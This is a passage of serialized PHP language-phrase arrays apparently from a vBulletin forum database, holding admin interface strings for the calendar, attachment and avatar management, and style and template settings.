must be greater than 1969. End Year must be less than 2038. \";s:11:\"date_x_to_y\";s:12:\"%1$s to %2$s\";s:12:\"default_view\";s:84:\"Default ViewView the user is presented with when they enter the calendar. \";s:12:\"delete_event\";s:12:\"Delete Event\";s:30:\"delete_reminder_for_this_event\";s:30:\"Delete Reminder for this Event\";s:16:\"delete_reminders\";s:16:\"Delete Reminders\";s:55:\"edit_calendar_permissions_for_usergroup_x_in_calendar_y\";s:76:\"Edit Calendar Permissions For Usergroup: %1$s in Calendar %2$s\";s:10:\"edit_event\";s:10:\"Edit Event\";s:31:\"edit_moderator_x_for_calendar_y\";s:51:\"Edit Moderator %1$s for Calendar %2$s\";s:11:\"eight_hours\";s:11:\"Eight Hours\";s:14:\"eighteen_hours\";s:14:\"Eighteen Hours\";s:27:\"emails_to_notify_when_event\";s:113:\"Email Addresses to Notify When There is a New Event (Separate each address with a space or line break) \";s:3:\"end\";s:3:\"End\";s:30:\"event_count_max_events_per_day\";s:169:\"Event Count(Sets the maximum number of events to be listed on a single day in the monthly view before a single link to all that day\'s Events is shown instead) \";s:10:\"event_date\";s:10:\"Event Date\";s:17:\"event_ignores_dst\";s:64:\"The times shown will remain constant, regardless of DST changes.\";s:17:\"event_information\";s:17:\"Event Information\";s:18:\"event_notification\";s:18:\"Event Notification\";s:13:\"event_options\";s:13:\"Event Options\";s:27:\"event_posted_for_timezone_x\";s:111:\"This event was posted for time zone %1$s so it will appear to occur on a different day on your calendar.\";s:12:\"event_poster\";s:12:\"Event Poster\";s:14:\"event_reminder\";s:14:\"Event Reminder\";s:18:\"event_title_cutoff\";s:161:\"Event Title Cutoff (Sets the maximum number of characters of an event title that are shown on the monthly view. To disable the cutoff, enter \'0\') \";s:14:\"event_uses_dst\";s:53:\"The times shown may change, depending on DST settings\";s:6:\"events\";s:6:\"Events\";s:5:\"every\";s:5:\"Every\";s:13:\"every_weekday\";s:13:\"Every weekday\";s:12:\"every_x_days\";s:276:\" Every \r\n day(s)\";s:9:\"every_x_y\";s:15:\"Every %1$s %2$s\";s:10:\"four_hours\";s:10:\"Four Hours\";s:6:\"fourth\";s:6:\"Fourth\";s:11:\"friday_abbr\";s:3:\"Fri\";s:12:\"friday_short\";s:1:\"F\";s:7:\"holiday\";s:7:\"Holiday\";s:42:\"if_you_would_like_to_remove_this_moderator\";s:42:\"If You Would Like to Remove this Moderator\";s:13:\"jump_to_month\";s:13:\"Jump to month\";s:18:\"maintain_same_time\";s:65:\"Maintain same time throughout the year, regardless of DST changes\";s:27:\"members_with_birthdays_on_x\";s:30:\"Members with Birthdays on %1$s\";s:6:\"midday\";s:6:\"Midday\";s:8:\"midnight\";s:8:\"Midnight\";s:15:\"moderate_events\";s:15:\"Moderate Events\";s:18:\"moderation_options\";s:18:\"Moderation Options\";s:11:\"monday_abbr\";s:3:\"Mon\";s:12:\"monday_short\";s:1:\"M\";s:12:\"monthly_view\";s:12:\"Monthly View\";s:10:\"move_event\";s:10:\"Move Event\";s:22:\"move_event_to_calendar\";s:22:\"Move Event to Calendar\";s:2:\"of\";s:2:\"of\";s:17:\"of_every_x_months\";s:153:\"of every\r\n \r\n month(s)\";s:7:\"one_day\";s:7:\"One Day\";s:8:\"one_hour\";s:8:\"One Hour\";s:11:\"or_set_time\";s:11:\"or Set Time\";s:12:\"ranged_event\";s:12:\"Ranged Event\";s:19:\"recur_every_x_weeks\";s:281:\" Every \r\n week(s) on\";s:18:\"recurrence_pattern\";s:18:\"Recurrence Pattern\";s:15:\"recurring_event\";s:15:\"Recurring Event\";s:16:\"recurring_option\";s:16:\"Recurring Option\";s:8:\"reminder\";s:8:\"Reminder\";s:36:\"reminder_emails_can_be_early_or_late\";s:180:\"Reminder emails can be slightly early or late. For example, a reminder scheduled for one hour before the event, will actually be sent between 1:15 and 45 minutes before the event.\";s:31:\"request_reminder_for_this_event\";s:31:\"Request Reminder for this Event\";s:60:\"require_moderator_validation_before_new_events_are_displayed\";s:60:\"Require moderator validation before new events are displayed\";s:13:\"saturday_abbr\";s:3:\"Sat\";s:14:\"saturday_short\";s:1:\"S\";s:10:\"save_event\";s:10:\"Save Event\";s:15:\"selected_events\";s:16:\"Selected Events:\";s:31:\"show_birthdays_on_this_calendar\";s:31:\"Show Birthdays on this Calendar\";s:37:\"show_easter_holidays_on_this_calendar\";s:41:\"Show predefined holidays on this Calendar\";s:30:\"show_holidays_on_this_calendar\";s:44:\"Show admin defined holidays on this Calendar\";s:10:\"show_today\";s:10:\"Show Today\";s:39:\"show_upcoming_events_from_this_calendar\";s:60:\"Show upcoming events from this Calendar on the forum index\r\n\";s:12:\"show_weekend\";s:175:\"Show Saturday / Sunday on this Calendar (Setting this to \'No\' forces the calendar to display only Monday to Friday, ignoring the user\'s start of week option) \";s:20:\"single_all_day_event\";s:21:\"Single, All Day Event\";s:9:\"six_hours\";s:9:\"Six Hours\";s:5:\"start\";s:5:\"Start\";s:13:\"start_of_week\";s:145:\"Start of the Week (Sets the default first day for the calendar, which will be shown to guests with no start of week preference) \";s:11:\"sunday_abbr\";s:3:\"Sun\";s:12:\"sunday_short\";s:1:\"S\";s:12:\"the_dropdown\";s:3:\"The\";s:12:\"the_x_y_of_z\";s:21:\"The %1$s %2$s of %3$s\";s:5:\"third\";s:5:\"Third\";s:31:\"this_event_occurs_every_weekday\";s:31:\"This event occurs every weekday\";s:30:\"this_event_occurs_every_x_days\";s:35:\"This event occurs every %1$s day(s)\";s:36:\"this_event_occurs_every_x_weeks_on_y\";s:44:\"This event occurs every %1$s week(s) on %2$s\";s:27:\"this_event_occurs_every_x_y\";s:33:\"This event occurs every %1$s %2$s\";s:44:\"this_event_occurs_on_day_x_of_every_y_months\";s:52:\"This event occurs on day %1$s of every %2$s month(s)\";s:35:\"this_event_occurs_on_every_x_y_of_z\";s:44:\"This event occurs on every %1$s %2$s of %3$s\";s:46:\"this_event_occurs_on_the_x_y_of_every_z_months\";s:57:\"This event occurs on the %1$s %2$s of every %3$s month(s)\";s:10:\"three_days\";s:10:\"Three Days\";s:11:\"three_hours\";s:11:\"Three Hours\";s:13:\"thursday_abbr\";s:3:\"Thu\";s:14:\"thursday_short\";s:1:\"T\";s:11:\"time_x_to_y\";s:64:\"%1$s to %2$s \";s:9:\"time_zone\";s:9:\"Time Zone\";s:20:\"to_delete_this_event\";s:73:\"To delete this event, click this box and press the \'Delete Event\' button.\";s:12:\"tuesday_abbr\";s:3:\"Tue\";s:13:\"tuesday_short\";s:1:\"T\";s:12:\"twelve_hours\";s:12:\"Twelve Hours\";s:8:\"two_days\";s:8:\"Two Days\";s:9:\"two_hours\";s:9:\"Two Hours\";s:16:\"update_reminders\";s:16:\"Update Reminders\";s:24:\"view_this_week_in_detail\";s:24:\"View This Week in Detail\";s:14:\"wednesday_abbr\";s:3:\"Wed\";s:15:\"wednesday_short\";s:1:\"W\";s:6:\"weekly\";s:6:\"Weekly\";s:11:\"weekly_view\";s:11:\"Weekly View\";s:34:\"when_to_send_reminder_before_event\";s:34:\"When to send reminder before event\";s:10:\"x_birthday\";s:15:\"%1$s\'s birthday\";s:11:\"x_birthdays\";s:14:\"%1$s Birthdays\";s:6:\"yearly\";s:6:\"Yearly\";s:11:\"yearly_view\";s:11:\"Yearly View\";s:27:\"you_have_no_event_reminders\";s:28:\"You have no event reminders.\";}', 'a:205:{s:19:\"add_a_single_avatar\";s:19:\"Add a Single Avatar\";s:22:\"add_a_single_post_icon\";s:22:\"Add a Single Post Icon\";s:19:\"add_a_single_smilie\";s:19:\"Add a Single Smilie\";s:10:\"add_avatar\";s:10:\"Add Avatar\";s:11:\"add_avatars\";s:11:\"Add Avatars\";s:20:\"add_multiple_avatars\";s:20:\"Add Multiple Avatars\";s:23:\"add_multiple_post_icons\";s:23:\"Add Multiple Post Icons\";s:20:\"add_multiple_smilies\";s:20:\"Add Multiple Smilies\";s:23:\"add_new_attachment_type\";s:23:\"Add New Attachment Type\";s:23:\"add_new_avatar_category\";s:23:\"Add New Avatar Category\";s:17:\"add_new_extension\";s:17:\"Add New Extension\";s:26:\"add_new_post_icon_category\";s:26:\"Add New Post Icon Category\";s:23:\"add_new_smilie_category\";s:23:\"Add New Smilie Category\";s:13:\"add_post_icon\";s:13:\"Add Post Icon\";s:14:\"add_post_icons\";s:14:\"Add Post Icons\";s:10:\"add_smilie\";s:10:\"Add Smilie\";s:11:\"add_smilies\";s:11:\"Add Smilies\";s:38:\"adding_multiple_avatars_reading_from_x\";s:48:\"Adding Multiple Avatars Reading from %1$s\";s:41:\"adding_multiple_post_icons_reading_from_x\";s:51:\"Adding Multiple Post Icons Reading from %1$s\";s:38:\"adding_multiple_smilies_reading_from_x\";s:48:\"Adding Multiple Smilies Reading from %1$s\";s:21:\"album_picture_manager\";s:21:\"Album Picture Manager\";s:14:\"album_pictures\";s:14:\"Album Pictures\";s:47:\"album_pictures_currently_file_system_with_thumb\";s:93:\"Album pictures are currently being stored in the file system with direct access to thumbnails\";s:50:\"album_pictures_currently_file_system_without_thumb\";s:96:\"Album pictures are currently being stored in the file system without direct access to thumbnails\";s:36:\"album_pictures_currently_in_database\";s:57:\"Album pictures are currently being stored in the database\";s:36:\"are_you_sure_want_to_delete_avatar_x\";s:160:\"Are you sure you want to delete the avatar called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:39:\"are_you_sure_want_to_delete_post_icon_x\";s:163:\"Are you sure you want to delete the post icon called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:36:\"are_you_sure_want_to_delete_smilie_x\";s:160:\"Are you sure you want to delete the smilie called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:53:\"are_you_sure_you_want_to_delete_the_attachment_type_x\";s:60:\"Are you sure you want to delete the attachment type: \'%1$s\'?\";s:48:\"are_you_sure_you_want_to_delete_the_attachment_x\";s:55:\"Are you sure you want to delete the attachment: \'%1$s\'?\";s:60:\"are_you_sure_you_want_to_delete_the_avatar_category_called_x\";s:459:\"Are you sure you want to delete the avatar category called: \'%1$s\'?\r\n \r\nDelete all Avatars from this category? Yes No If you do not want to delete all Avatars from this category, they will all be moved to the category selected below. Destination Category: \\n%2$s\\t\\t \";s:63:\"are_you_sure_you_want_to_delete_the_post_icon_category_called_x\";s:464:\"Are you sure you want to delete the post icon category called: \'%1$s\'? Delete all Post Icons from this category? Yes No If you do not want to delete all Post Icons from this category, they will all be moved to the category selected below. Destination Category: \\n%2$s\\t\\t \";s:60:\"are_you_sure_you_want_to_delete_the_smilie_category_called_x\";s:455:\"Are you sure you want to delete the Smilie category called: \'%1$s\'? Delete all Smilies from this category? Yes No If you do not want to delete all Smilies from this category, they will all be moved to the category selected below. Destination Category: \\n%2$s\\t\\t \";s:49:\"are_you_sure_you_want_to_delete_these_attachments\";s:50:\"Are you sure you want to delete these attachments?\";s:14:\"attached_after\";s:47:\"Attached After (yyyy-mm-dd hh:mm:ss) \";s:15:\"attached_before\";s:48:\"Attached Before (yyyy-mm-dd hh:mm:ss) \";s:11:\"attached_by\";s:33:\"Attached By (username) \";s:24:\"attachment_file_path_dfn\";s:118:\"Attachment File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:21:\"attachment_is_visible\";s:21:\"Attachment is Visible\";s:18:\"attachment_manager\";s:18:\"Attachment Manager\";s:22:\"attachment_permissions\";s:22:\"Attachment Permissions\";s:30:\"attachment_permissions_manager\";s:30:\"Attachment Permissions Manager\";s:18:\"attachment_removal\";s:883:\"We have completed moving attachments to the filesystem. Presently, the attachments still remain in the database and are being read from there. If you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the database. This step cannot be reversed and may take a few minutes depending on the size of your database. Please be patient. \r\nAttachments in Database: %1$s \r\nTotal Attachments Processed: %2$s \r\nThe above two values should be the same! \r\nNumber of Attachments that could not be created or are 0 bytes: %3$s \r\nThe above value should be 0 ! Having 0 byte attachments is not uncommon so a few is nothing to worry about but if the number equals the number of attachments in the database then DO NOT FINALIZE this step or you will lose all of your attachments.\";s:15:\"attachment_type\";s:15:\"Attachment Type\";s:21:\"attachmentid_start_at\";s:146:\"Attachmentid to start at:Set this if you have partially completed a conversion. You should start at 0 to insure an error free transfer. \";s:54:\"attachments_are_currently_being_stored_in_the_database\";s:54:\"Attachments are currently being stored in the database\";s:61:\"attachments_are_currently_being_stored_in_the_filesystem_at_x\";s:64:\"Attachments are currently being stored in the filesystem at %1$s\";s:28:\"attachments_to_show_per_page\";s:28:\"Attachments to Show Per Page\";s:6:\"avatar\";s:6:\"Avatar\";s:15:\"avatar_category\";s:15:\"Avatar Category\";s:16:\"avatar_file_path\";s:16:\"Avatar File Path\";s:20:\"avatar_file_path_dfn\";s:114:\"Avatar File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:14:\"avatar_manager\";s:14:\"Avatar Manager\";s:18:\"avatar_permissions\";s:18:\"Avatar Permissions\";s:59:\"avatars_are_currently_being_served_from_the_filesystem_at_x\";s:62:\"Avatars are currently being served from the filesystem at %1$s\";s:15:\"avatars_deleted\";s:15:\"Avatars Deleted\";s:17:\"avatars_file_path\";s:17:\"Avatars File Path\";s:24:\"avatars_to_show_per_page\";s:24:\"Avatars to Show Per Page\";s:27:\"average_attachment_filesize\";s:27:\"Average Attachment Filesize\";s:28:\"can_use_this_avatar_category\";s:28:\"Can Use This Avatar Category\";s:22:\"can_use_this_extension\";s:22:\"Can use this extension\";s:31:\"can_use_this_post_icon_category\";s:31:\"Can Use This Post Icon Category\";s:28:\"can_use_this_smilie_category\";s:28:\"Can Use This Smilie Category\";s:26:\"confirm_attachment_removal\";s:26:\"Confirm Attachment Removal\";s:37:\"confirm_deletion_of_attachment_type_x\";s:69:\"Confirm Deletion of Attachment Type: %1$s \";s:37:\"confirm_deletion_of_avatar_category_x\";s:69:\"Confirm Deletion of Avatar Category: %1$s \";s:40:\"confirm_deletion_of_post_icon_category_x\";s:72:\"Confirm Deletion of Post Icon Category: %1$s \";s:37:\"confirm_deletion_of_smilie_category_x\";s:69:\"Confirm Deletion of Smilie Category: %1$s \";s:28:\"confirm_picture_data_removal\";s:28:\"Confirm Picture Data Removal\";s:8:\"contains\";s:8:\"Contains\";s:29:\"custom_attachment_permissions\";s:29:\"Custom Attachment Permissions\";s:27:\"delete_selected_attachments\";s:27:\"Delete Selected Attachments\";s:15:\"disk_space_used\";s:15:\"Disk Space Used\";s:9:\"downloads\";s:9:\"Downloads\";s:22:\"downloads_greater_than\";s:21:\"More Than X Downloads\";s:19:\"downloads_less_than\";s:21:\"Less Than X Downloads\";s:15:\"edit_attachment\";s:15:\"Edit Attachment\";s:58:\"edit_attachment_permissions_for_usergroup_x_in_extension_y\";s:79:\"Edit Attachment Permissions For Usergroup: %1$s in Extension %2$s\";s:22:\"edit_avatar_categories\";s:22:\"Edit Avatar Categories\";s:25:\"edit_post_icon_categories\";s:25:\"Edit Post Icon Categories\";s:22:\"edit_smilie_categories\";s:22:\"Edit Smilie Categories\";s:17:\"edit_storage_type\";s:17:\"Edit Storage Type\";s:9:\"extension\";s:9:\"Extension\";s:12:\"file_removal\";s:958:\"Attachments in Database: %1$s \r\nTotal Attachments Processed: %2$s \r\nThe above two values should be the same! \r\nNumber of Attachments that could not be read or are 0 bytes: %3$s \r\nWe have completed moving attachments to the database. Presently, the attachments still remain in the filesystem but are being read from the database.\r\nIf you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the filesystem. \r\nThis step cannot be reversed and may take a few minutes depending on the number of attachments. Please be patient. \r\nWe will only be able to remove attachments and attachment directories that we have write permission to. Normally this should be every attachment\r\nbut sometimes the permissions are not correct and the removal will fail. You will need to manually remove the attachments from the filesystem\r\nin this event.\";s:8:\"filesize\";s:8:\"Filesize\";s:21:\"filesize_greater_than\";s:40:\"Filesize Greater Than (bytes) \";s:18:\"filesize_less_than\";s:37:\"Filesize Less Than (bytes) \";s:8:\"filetype\";s:8:\"filetype\";s:8:\"finalize\";s:8:\"Finalize\";s:36:\"find_all_attachments_older_than_days\";s:38:\"Find All Attachments Older Than X Days\";s:24:\"five_largest_attachments\";s:24:\"Five Largest Attachments\";s:29:\"five_most_popular_attachments\";s:29:\"Five Most Popular Attachments\";s:32:\"five_users_most_attachment_space\";s:51:\"Five Users Whose Attachments Take Up the Most Space\";s:22:\"full_picture_file_path\";s:122:\"Full Picture File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:13:\"full_pictures\";s:13:\"Full Pictures\";s:38:\"function_rebuilds_album_picture_thumbs\";s:114:\"This function rebuilds the album picture thumbnails. It is needed when you change thumbnail dimensions or quality.\";s:51:\"images_are_currently_being_served_from_the_database\";s:51:\"Images are currently being served from the database\";s:37:\"keep_pictures_file_system_allow_thumb\";s:67:\"Keep pictures in file system, but allow direct access to thumbnails\";s:39:\"keep_pictures_file_system_disable_thumb\";s:70:\"Keep pictures in file system, but disallow direct access to thumbnails\";s:14:\"max_height_dfn\";s:166:\"Maximum Height(in pixels, 600 for example) This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. \";s:13:\"max_width_dfn\";s:165:\"Maximum Width(in pixels, 800 for example) This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. \";s:16:\"maximum_filesize\";s:16:\"Maximum Filesize\";s:20:\"maximum_filesize_dfn\";s:214:\"Max Filesize(in bytes) There are several configuration options that limit the maximum size of uploaded files. Consult the Quick Stats on the your main Admin CP page for your current settings. \";s:14:\"maximum_height\";s:10:\"Max Height\";s:13:\"maximum_width\";s:9:\"Max Width\";s:13:\"mime_type_dfn\";s:361:\"Mime Type & HeadersThis controls what your browser does with the attachment. Leave blank if you don\'t know what to put here and the user will generally be prompted to download the attachment. This option is intended to be filled with HTTP Headers, one per line. To specify a MIME type, please use Content-Type: type/subtype \";s:37:\"move_avatars_to_a_different_directory\";s:37:\"Move Avatars to a Different Directory\";s:40:\"move_items_from_database_into_filesystem\";s:41:\"Move Items from Database into File System\";s:40:\"move_items_from_filesystem_into_database\";s:41:\"Move Items from File System into Database\";s:35:\"move_items_to_a_different_directory\";s:35:\"Move Items to a Different Directory\";s:27:\"move_pictures_into_database\";s:31:\"Move pictures into the database\";s:41:\"move_pictures_into_file_system_with_thumb\";s:67:\"Move pictures into the file system with direct access to thumbnails\";s:44:\"move_pictures_into_file_system_without_thumb\";s:70:\"Move pictures into the file system without direct access to thumbnails\";s:32:\"move_pictures_within_file_system\";s:36:\"Move pictures within the file system\";s:41:\"move_profilepics_to_a_different_directory\";s:46:\"Move Profile Pictures to a Different Directory\";s:37:\"move_sigpics_to_a_different_directory\";s:48:\"Move Signature Pictures to a Different Directory\";s:10:\"new_window\";s:7:\"New Win\";s:42:\"number_of_attachments_to_process_per_cycle\";s:42:\"Number of attachments to process per cycle\";s:36:\"number_of_users_to_process_per_cycle\";s:36:\"Number of Users to process per cycle\";s:25:\"number_pictures_per_cycle\";s:39:\"Number of pictures to process per cycle\";s:18:\"open_in_new_window\";s:45:\"Open this attachment in a new browser window?\";s:29:\"or_enter_a_full_url_to_a_file\";s:39:\"Or enter a full URL to a file to upload\";s:33:\"permissions_for_avatar_category_x\";s:64:\"Permissions For Avatar Category %1$s \";s:36:\"permissions_for_post_icon_category_x\";s:67:\"Permissions For Post Icon Category %1$s \";s:33:\"permissions_for_smilie_category_x\";s:64:\"Permissions For Smilie Category %1$s \";s:27:\"picture_thumbnail_file_path\";s:131:\"Picture and Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:33:\"pictures_moved_database_count_xyz\";s:316:\" Pictures have been moved to the database. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.
\r\nSelecting finalize below will remove the duplicate data from the file system and begin serving pictures from the database. Any pictures that did not convert successfully will be lost.
\";s:36:\"pictures_moved_file_system_count_xyz\";s:319:\"Pictures have been moved to the file system. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.
\r\nSelecting finalize below will remove the duplicate data from the database and begin serving pictures from the file system. Any pictures that did not convert successfully will be lost.
\";s:44:\"pictures_moved_thumbnails_disabled_count_xyz\";s:305:\"Picture thumbnails have been moved and are no longer directly accessible. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.
\r\nSelecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.
\";s:43:\"pictures_moved_thumbnails_enabled_count_xyz\";s:299:\"Picture thumbnails have been moved and are now directly accessible. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.
\r\nSelecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.
\";s:30:\"please_select_a_file_to_attach\";s:63:\"Please select a file to attach by using the \"Browse...\" button.\";s:39:\"possible_not_enough_disk_space_finalize\";s:305:\"It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
\r\n\r\nWe will not finalize the move until the end of the process.
\r\n\r\nIf the process aborts before the end, you will need to free up space before trying again.
\";s:9:\"post_icon\";s:9:\"Post Icon\";s:18:\"post_icon_category\";s:18:\"Post Icon Category\";s:19:\"post_icon_file_path\";s:19:\"Post Icon File Path\";s:23:\"post_icon_file_path_dfn\";s:117:\"Post Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:17:\"post_icon_manager\";s:17:\"Post Icon Manager\";s:21:\"post_icon_permissions\";s:21:\"Post Icon Permissions\";s:18:\"post_icons_deleted\";s:18:\"Post Icons Deleted\";s:20:\"post_icons_file_path\";s:20:\"Post Icons File Path\";s:27:\"post_icons_to_show_per_page\";s:27:\"Post Icons to Show Per Page\";s:17:\"processing_avatar\";s:17:\"Processing Avatar\";s:20:\"processing_post_icon\";s:20:\"Processing Post Icon\";s:17:\"processing_smilie\";s:21:\"Processing Smilie ...\";s:15:\"profile_picture\";s:15:\"Profile Picture\";s:24:\"profilepic_file_path_dfn\";s:118:\"Profile Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:63:\"profilepics_are_currently_being_served_from_the_filesystem_at_x\";s:71:\"Profile pictures are currently being served from the filesystem at %1$s\";s:17:\"prune_attachments\";s:17:\"Prune Attachments\";s:37:\"read_disable_direct_access_thumbnails\";s:67:\"We are ready to disable direct access to your pictures\' thumbnails.\";s:39:\"ready_move_pictures_file_system_options\";s:87:\"We are ready to move your pictures into the file system with the options you specified.\";s:33:\"ready_move_pictures_into_database\";s:53:\"We are ready to move your pictures into the database.\";s:32:\"rebuild_album_picture_thumbnails\";s:32:\"Rebuild Album Picture Thumbnails\";s:22:\"removing_x_attachments\";s:61:\"Removing %1$s attachments from the database.\";s:18:\"removing_x_records\";s:23:\"Removing %1$s record(s)\";s:18:\"replace_attachment\";s:18:\"Replace Attachment\";s:16:\"show_all_avatars\";s:16:\"Show All Avatars\";s:19:\"show_all_post_icons\";s:19:\"Show All Post Icons\";s:16:\"show_all_smilies\";s:16:\"Show all Smilies\";s:31:\"showing_attachments_x_to_y_of_z\";s:40:\"Showing Attachments %1$s to %2$s of %3$s\";s:20:\"sigpic_file_path_dfn\";s:120:\"Signature Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:59:\"sigpics_are_currently_being_served_from_the_filesystem_at_x\";s:73:\"Signature pictures are currently being served from the filesystem at %1$s\";s:6:\"smilie\";s:6:\"Smilie\";s:15:\"smilie_category\";s:15:\"Smilie Category\";s:16:\"smilie_file_path\";s:16:\"Smilie File Path\";s:20:\"smilie_file_path_dfn\";s:114:\"Smilie File PathThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:14:\"smilie_manager\";s:14:\"Smilie Manager\";s:18:\"smilie_permissions\";s:18:\"Smilie Permissions\";s:15:\"smilies_deleted\";s:15:\"Smilies Deleted\";s:17:\"smilies_file_path\";s:17:\"Smilies File Path\";s:24:\"smilies_to_show_per_page\";s:24:\"Smilies to Show Per Page\";s:18:\"smilietext_x_taken\";s:44:\"The replacement text %1$s is already in use!\";s:45:\"standard_using_default_attachment_permissions\";s:53:\"Standard: Using default attachment permissions\";s:19:\"starting_picture_id\";s:19:\"Starting Picture ID\";s:12:\"storage_type\";s:12:\"Storage Type\";s:15:\"text_to_replace\";s:15:\"Text to Replace\";s:5:\"thumb\";s:5:\"Thumb\";s:19:\"thumbnail_file_path\";s:119:\"Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777) \";s:15:\"thumbnail_image\";s:210:\"Display thumbnail for this type?This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. The creation of a thumbnail for any image type is not guaranteed. \";s:17:\"thumbnail_quality\";s:17:\"Thumbnail Quality\";s:10:\"thumbnails\";s:10:\"Thumbnails\";s:17:\"total_attachments\";s:17:\"Total Attachments\";s:15:\"total_downloads\";s:15:\"Total Downloads\";s:10:\"total_size\";s:10:\"Total Size\";s:13:\"uncategorized\";s:13:\"uncategorized\";s:13:\"upload_avatar\";s:13:\"Upload Avatar\";s:16:\"upload_post_icon\";s:16:\"Upload Post Icon\";s:13:\"upload_smilie\";s:13:\"Upload Smilie\";s:48:\"url_to_avatars_relative_to_your_forums_home_page\";s:61:\"URL to avatars (Relative to your forums home page) \";s:52:\"url_to_profilepics_relative_to_your_forums_home_page\";s:70:\"URL to Profile Pictures (Relative to your forums home page) \";s:48:\"url_to_sigpics_relative_to_your_forums_home_page\";s:71:\"URL to Signature Pictures(Relative to your forums home page) \";s:17:\"url_to_thumbnails\";s:64:\"URL to Thumbnails\r\n(relative to main forum directory) \";s:23:\"use_default_permissions\";s:103:\"Use Default Permissions for this extension (Note: this will delete any previous custom permissions set)\";s:13:\"user_pictures\";s:13:\"User Pictures\";s:15:\"userpic_manager\";s:20:\"User Picture Manager\";s:16:\"view_attachments\";s:16:\"View Attachments\";s:24:\"view_largest_attachments\";s:24:\"View Largest Attachments\";s:29:\"view_most_popular_attachments\";s:29:\"View Most Popular Attachments\";s:23:\"view_newest_attachments\";s:23:\"View Newest Attachments\";s:23:\"view_oldest_attachments\";s:23:\"View Oldest Attachments\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:7:\"visible\";s:7:\"Visible\";s:76:\"we_are_ready_to_attempt_to_move_your_attachments_from_database_to_filesystem\";s:392:\"We are ready to attempt to move your Attachments from the Database to the Filesystem.
It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
\";s:76:\"we_are_ready_to_attempt_to_move_your_attachments_from_filesystem_to_database\";s:382:\"We are ready to attempt to move your Attachments from the Filesystem to the Database.
It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
\";s:71:\"we_are_ready_to_attempt_to_move_your_images_from_database_to_filesystem\";s:387:\"We are ready to attempt to move your Images from the Database to the Filesystem.
It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.
We will not finalize the move until the end of the process.
If the process aborts before the end, you will need to free up space before trying again.
\";s:71:\"we_are_ready_to_attempt_to_move_your_images_from_filesystem_to_database\";s:377:\"We are ready to attempt to move your images from the filesystem to the database.
\r\n\r\nIt is possible that you might not have enough space in the database, but we are unable to determine that ahead of time.
\r\n\r\nWe will not finalize the move until the end of the process. If the process aborts before the end, you will need to free up space before trying again.
\";}', 'a:340:{s:15:\"0_matches_found\";s:15:\"0 Matches Found\";s:15:\"add_child_style\";s:15:\"Add Child Style\";s:28:\"add_new_replacement_variable\";s:28:\"Add New Replacement Variable\";s:13:\"add_new_style\";s:13:\"Add New Style\";s:16:\"add_new_template\";s:16:\"Add New Template\";s:14:\"additional_css\";s:26:\"Additional CSS Definitions\";s:26:\"additional_css_description\";s:191:\"Advanced Users: If you would like to add any additional CSS for use in your custom templates, any text entered here will be included at the end of the <style> tag \";s:20:\"additional_functions\";s:20:\"Additional Functions\";s:25:\"adsense_advertising_intro\";s:824:\"This screen will allow you to quickly roll-out Google AdSense advertising units into your vBulletin forum advertising templates, based on your Google AdSense account settings defined in the members\' area at vBulletin.com. \r\n \r\nThere are two different advertising options available, Low and High, and an option to control the type of ad that is displayed. Please choose the option that you would prefer for your community. \r\n \r\nPlease note that utilizing Google AdSense code within your site or community is subject to the Google AdSense terms and conditions . \r\n \r\nTo further configure your Google AdSense account, please visit the Google AdSense website.\";s:23:\"adsense_deployment_high\";s:71:\"You are running the \"High\" package of Google AdSense ads on your forum.\";s:22:\"adsense_deployment_low\";s:70:\"You are running the \"Low\" package of Google AdSense ads on your forum.\";s:23:\"adsense_deployment_none\";s:57:\"You are not running any Google AdSense ads on your forum.\";s:12:\"align_center\";s:12:\"Align Center\";s:10:\"align_left\";s:10:\"Align Left\";s:11:\"align_right\";s:11:\"Align Right\";s:9:\"alignment\";s:9:\"Alignment\";s:17:\"all_style_options\";s:17:\"All Style Options\";s:19:\"all_template_groups\";s:19:\"All Template Groups\";s:50:\"are_you_sure_want_to_delete_replacement_variable_x\";s:174:\"Are you sure you want to delete the replacement variable called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:35:\"are_you_sure_want_to_delete_style_x\";s:159:\"Are you sure you want to delete the style called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:38:\"are_you_sure_want_to_revert_template_x\";s:162:\"Are you sure you want to revert the template called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone.\";s:23:\"attachment_icons_folder\";s:158:\"Attachment Icons Folder\r\nThis folder contains the various icons used to represent different attachment file types such as txt, jpg, zip etc. \";s:21:\"attachment_is_visible\";s:21:\"Attachment is Visible\";s:15:\"available_fonts\";s:15:\"Available Fonts\";s:15:\"available_sizes\";s:15:\"Available 